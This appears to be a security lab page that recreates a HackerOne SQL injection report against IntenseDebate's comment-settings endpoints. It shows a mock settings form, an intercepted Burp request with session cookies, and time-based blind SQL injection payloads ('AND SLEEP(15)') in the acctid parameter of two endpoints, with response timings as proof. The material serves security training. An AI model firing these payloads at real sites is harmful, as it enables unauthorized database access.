Comment Settings — IntenseDebate

Lab Info

HackerOne #1042746

Critical · Automattic
Vuln: GET acctid integer
No WAF · No bypass needed

          acctid=419523%20AND%20SLEEP(15)
        

Comment Settings — changeReplaceOpt

Configure comment replacement and threading options

Account ID 419523

Username fuzzme

Blog myblog.example.com

Country FR

Replace Options

Option (opt):

Enable Comment Threading Allow nested comment replies. Recommended for active discussions.

Replace Existing Comments Migrate existing blog comments into IntenseDebate.

Email Notifications Receive email when new comments are posted.

Intercepted Request (Burp Proxy)

GET /changeReplaceOpt.php?opt=1&acctid=419523 HTTP/1.1

Host: www.intensedebate.com

Cookie: country_code=FR; idcomments_userid=26745306; idcomments_token=2008983fa4c2434ecc83a8c2bec380d3|1607463572

⚠ Modify acctid in Repeater: acctid=419523%20AND%20SLEEP(7) → 7,486ms response | acctid=419523%20AND%20SLEEP(15) → 15,414ms response

Bonus: Second Vulnerable Endpoint (reporter's second finding)

GET /js/commentAction/?data={"action":"commentAction","params":{"acctid":"419523 AND SLEEP(7)"}}

Try: 122.php?data={"action":"commentAction","params":{"acctid":"419523 AND SLEEP(7)"}}